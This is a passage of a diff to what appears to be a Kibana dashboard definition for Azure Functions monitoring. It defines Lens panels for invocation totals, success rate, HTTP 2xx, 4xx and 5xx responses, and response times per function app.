"b37bb938-9515-453c-a5ff-f384a7351317", - "b37bb938-9515-453c-a5ff-f384a7351317X1", - "b37bb938-9515-453c-a5ff-f384a7351317X0", - "b37bb938-9515-453c-a5ff-f384a7351317X2" - ], - "columns": { - "2cbcc3e5-5848-4a88-910b-7c845618ae2e": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total number of invocations", - "operationType": "sum", - "params": { - 
"emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.requests.total" - }, - "b37bb938-9515-453c-a5ff-f384a7351317": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Success Percentage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", - "isFormulaBroken": false - }, - "references": [ - "b37bb938-9515-453c-a5ff-f384a7351317X2" - ], - "scale": "ratio" - }, - "b37bb938-9515-453c-a5ff-f384a7351317X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Success Percentage", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "azure.functions.http2xx.total" - }, - "b37bb938-9515-453c-a5ff-f384a7351317X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Success Percentage", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "azure.functions.requests.total" - }, - "b37bb938-9515-453c-a5ff-f384a7351317X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Success Percentage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "b37bb938-9515-453c-a5ff-f384a7351317X0", - "b37bb938-9515-453c-a5ff-f384a7351317X1" - ], - "location": { - "max": 73, - "min": 0 - }, - "name": "divide", - "text": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", - "type": "function" - } - }, - "references": [ - "b37bb938-9515-453c-a5ff-f384a7351317X0", - "b37bb938-9515-453c-a5ff-f384a7351317X1" - ], - "scale": "ratio" - }, - "c4d0be17-9d74-468d-8e55-a064664300d1": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Top 10 Function Apps", - "operationType": "terms", - "params": 
{ - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "description": "Shows the number of successful invocations as a percentage of the total invocations per function app. ", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "44c459b4-623b-4534-ba78-8904669ae9cb", + "w": 23, + "x": 25, + "y": 0 + }, + "panelIndex": "44c459b4-623b-4534-ba78-8904669ae9cb", + "title": "Success Rate", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b0c25d59-67fb-4970-8b15-1da58db41925": { + "columnOrder": [ + "87ec7063-bff9-4d15-87e7-8f1da7b3f12b", + "bf6104e4-667c-4384-b819-842c52698256" + ], + "columns": { + "87ec7063-bff9-4d15-87e7-8f1da7b3f12b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bf6104e4-667c-4384-b819-842c52698256", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + 
"parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "c4d0be17-9d74-468d-8e55-a064664300d1", - "isTransposed": false - }, - { - "alignment": "left", - "colorMode": "cell", - "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", - "isTransposed": false, - "palette": { - "name": "positive", - "params": { - "stops": [ - { - "color": "#d6e9e4", - "stop": 20 - }, - { - "color": "#aed3ca", - "stop": 40 - }, - { - "color": "#85bdb1", - "stop": 60 - }, - { - "color": "#5aa898", - "stop": 80 - }, - { - "color": "#209280", - "stop": 100 - } - ] - }, - "type": "palette" - }, - "summaryRow": "none" - }, - { - "alignment": "left", - "columnId": "b37bb938-9515-453c-a5ff-f384a7351317", - "isTransposed": false - } - ], - "layerId": "8e323fe9-19c2-405d-bbf6-ba61dc9a190f", - "layerType": "data" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "description": "Shows the number of successful invocations as a percentage of the total invocations per function app. 
", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "44c459b4-623b-4534-ba78-8904669ae9cb", - "w": 23, - "x": 25, - "y": 0 - }, - "panelIndex": "44c459b4-623b-4534-ba78-8904669ae9cb", - "title": "Success Rate", - "type": "lens", - "version": "8.7.1" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", - "type": "index-pattern" + "bf6104e4-667c-4384-b819-842c52698256": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.requests.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "b0c25d59-67fb-4970-8b15-1da58db41925": { - "columnOrder": [ - "87ec7063-bff9-4d15-87e7-8f1da7b3f12b", - "bf6104e4-667c-4384-b819-842c52698256" - ], - "columns": { - "87ec7063-bff9-4d15-87e7-8f1da7b3f12b": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "bf6104e4-667c-4384-b819-842c52698256", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "bf6104e4-667c-4384-b819-842c52698256": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.requests.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": 
"azure.functions.requests.total" - } - }, - "incompleteColumns": {} - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.requests.total" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "b0c25d59-67fb-4970-8b15-1da58db41925", + "layerType": "data", + "legendDisplay": "default", + "legendPosition": "right", + "metrics": [ + "bf6104e4-667c-4384-b819-842c52698256" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "87ec7063-bff9-4d15-87e7-8f1da7b3f12b" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "9196bdde-1f73-46f5-97f6-09db15a28b61", + "w": 10, + "x": 0, + "y": 6 + }, + "panelIndex": "9196bdde-1f73-46f5-97f6-09db15a28b61", + "title": "Total Number of Invocations across Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "Number of Function invocations that resulted in a HTTP 2xx response code", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4689dc73-dc78-4c03-b975-62264d68c33b": { + "columnOrder": [ + "cb555077-660a-4e41-8974-9ad2d8e3b235", + "a3e51351-a9f0-414d-857e-d908e3919b15", + "a074efc1-3210-40c8-af5b-ba97da2de1ac" + ], + "columns": { + "a074efc1-3210-40c8-af5b-ba97da2de1ac": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.http2xx.total", + "operationType": "sum", + "params": { + "emptyAsNull": 
true + }, + "scale": "ratio", + "sourceField": "azure.functions.http2xx.total" + }, + "a3e51351-a9f0-414d-857e-d908e3919b15": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "cb555077-660a-4e41-8974-9ad2d8e3b235": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a074efc1-3210-40c8-af5b-ba97da2de1ac", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "b0c25d59-67fb-4970-8b15-1da58db41925", - "layerType": "data", - "legendDisplay": "default", - "legendPosition": "right", - "metrics": [ - "bf6104e4-667c-4384-b819-842c52698256" - ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "87ec7063-bff9-4d15-87e7-8f1da7b3f12b" - ] - } - ], - "shape": "donut" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "9196bdde-1f73-46f5-97f6-09db15a28b61", - "w": 10, - "x": 0, - "y": 6 - }, - "panelIndex": "9196bdde-1f73-46f5-97f6-09db15a28b61", - "title": "Total Number of Invocations across Function Apps", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": 
[], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a074efc1-3210-40c8-af5b-ba97da2de1ac" + ], + "layerId": "4689dc73-dc78-4c03-b975-62264d68c33b", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": "cb555077-660a-4e41-8974-9ad2d8e3b235", + "xAccessor": "a3e51351-a9f0-414d-857e-d908e3919b15" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "Number of Function invocations that resulted in a HTTP 2xx response code", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "4689dc73-dc78-4c03-b975-62264d68c33b": { - "columnOrder": [ - "cb555077-660a-4e41-8974-9ad2d8e3b235", - "a3e51351-a9f0-414d-857e-d908e3919b15", - "a074efc1-3210-40c8-af5b-ba97da2de1ac" - ], - "columns": { - "a074efc1-3210-40c8-af5b-ba97da2de1ac": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.http2xx.total", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http2xx.total" - }, - "a3e51351-a9f0-414d-857e-d908e3919b15": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - 
"includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "cb555077-660a-4e41-8974-9ad2d8e3b235": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "a074efc1-3210-40c8-af5b-ba97da2de1ac", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "5430e8a9-47ae-4c82-96b7-b0287026409f", + "w": 16, + "x": 0, + "y": 15 + }, + "panelIndex": "5430e8a9-47ae-4c82-96b7-b0287026409f", + "title": "HTTP 2xx Responses", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "54edca01-9fb6-444a-8d98-ddb0ff36f9be": { + "columnOrder": [ + "6eddce7c-5301-479c-ab7b-8c574999c145", + "38a86941-b5ec-4a83-9684-0f70bb14a361", + "94937bdd-d5bb-469e-83b9-89e34f3a4614" + ], + "columns": { + "38a86941-b5ec-4a83-9684-0f70bb14a361": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6eddce7c-5301-479c-ab7b-8c574999c145": { + 
"dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "94937bdd-d5bb-469e-83b9-89e34f3a4614", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a074efc1-3210-40c8-af5b-ba97da2de1ac" - ], - "layerId": "4689dc73-dc78-4c03-b975-62264d68c33b", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "cb555077-660a-4e41-8974-9ad2d8e3b235", - "xAccessor": "a3e51351-a9f0-414d-857e-d908e3919b15" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "5430e8a9-47ae-4c82-96b7-b0287026409f", - "w": 16, - "x": 0, - "y": 15 - }, - "panelIndex": "5430e8a9-47ae-4c82-96b7-b0287026409f", - "title": "HTTP 2xx Responses", - "type": "lens", - "version": "8.7.1" + "94937bdd-d5bb-469e-83b9-89e34f3a4614": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.http4xx.total", + 
"operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.http4xx.total" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "94937bdd-d5bb-469e-83b9-89e34f3a4614" + ], + "layerId": "54edca01-9fb6-444a-8d98-ddb0ff36f9be", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": "6eddce7c-5301-479c-ab7b-8c574999c145", + "xAccessor": "38a86941-b5ec-4a83-9684-0f70bb14a361" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "54edca01-9fb6-444a-8d98-ddb0ff36f9be": { - "columnOrder": [ - "6eddce7c-5301-479c-ab7b-8c574999c145", - "38a86941-b5ec-4a83-9684-0f70bb14a361", - "94937bdd-d5bb-469e-83b9-89e34f3a4614" - ], - "columns": { - "38a86941-b5ec-4a83-9684-0f70bb14a361": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - 
}, - "6eddce7c-5301-479c-ab7b-8c574999c145": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "94937bdd-d5bb-469e-83b9-89e34f3a4614", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "94937bdd-d5bb-469e-83b9-89e34f3a4614": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.http4xx.total", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http4xx.total" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "Number of Function invocations that resulted in a HTTP 2xx response code", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", + "w": 16, + "x": 16, + "y": 15 + }, + "panelIndex": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", + "title": "HTTP 4xx Responses", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "Number of server errors or exceptions. 
", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8": { + "columnOrder": [ + "ed0b46b6-3210-492d-b67b-027e0b427588", + "f4765a92-4ba2-4936-afa3-7e8648c99a8d", + "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" + ], + "columns": { + "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.http5xx.total", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.http5xx.total" + }, + "ed0b46b6-3210-492d-b67b-027e0b427588": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "94937bdd-d5bb-469e-83b9-89e34f3a4614" - ], - "layerId": "54edca01-9fb6-444a-8d98-ddb0ff36f9be", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "6eddce7c-5301-479c-ab7b-8c574999c145", - "xAccessor": "38a86941-b5ec-4a83-9684-0f70bb14a361" - } - ], - "legend": { - "isVisible": true, - 
"position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "Number of Function invocations that resulted in a HTTP 2xx response code", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", - "w": 16, - "x": 16, - "y": 15 - }, - "panelIndex": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", - "title": "HTTP 4xx Responses", - "type": "lens", - "version": "8.7.1" + "f4765a92-4ba2-4936-afa3-7e8648c99a8d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" + ], + "layerId": "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", + "layerType": "data", + "seriesType": "bar", + "splitAccessor": "ed0b46b6-3210-492d-b67b-027e0b427588", + "xAccessor": "f4765a92-4ba2-4936-afa3-7e8648c99a8d" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + 
"valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "Number of server errors or exceptions. ", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8": { - "columnOrder": [ - "ed0b46b6-3210-492d-b67b-027e0b427588", - "f4765a92-4ba2-4936-afa3-7e8648c99a8d", - "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" - ], - "columns": { - "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.http5xx.total", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http5xx.total" - }, - "ed0b46b6-3210-492d-b67b-027e0b427588": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "f4765a92-4ba2-4936-afa3-7e8648c99a8d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": 
"266a1bc1-c35b-4959-96c1-5d799a98754c", + "w": 16, + "x": 32, + "y": 15 + }, + "panelIndex": "266a1bc1-c35b-4959-96c1-5d799a98754c", + "title": "HTTP 5xx Error Responses", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The time taken for the app to serve requests.", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8d0f0cfa-b115-4100-ba7e-1cadee108055": { + "columnOrder": [ + "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", + "234483e9-2403-442e-bb76-d6315e2517af", + "bde63578-63d7-43ab-ad04-0b810b2f4033" + ], + "columns": { + "234483e9-2403-442e-bb76-d6315e2517af": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bde63578-63d7-43ab-ad04-0b810b2f4033", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - 
"8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" - ], - "layerId": "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", - "layerType": "data", - "seriesType": "bar", - "splitAccessor": "ed0b46b6-3210-492d-b67b-027e0b427588", - "xAccessor": "f4765a92-4ba2-4936-afa3-7e8648c99a8d" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "266a1bc1-c35b-4959-96c1-5d799a98754c", - "w": 16, - "x": 32, - "y": 15 - }, - "panelIndex": "266a1bc1-c35b-4959-96c1-5d799a98754c", - "title": "HTTP 5xx Error Responses", - "type": "lens", - "version": "8.7.1" + "bde63578-63d7-43ab-ad04-0b810b2f4033": { + "dataType": "number", + "isBucketed": false, + "label": "Average of azure.functions.http_response_time.avg", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.http_response_time.avg" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + 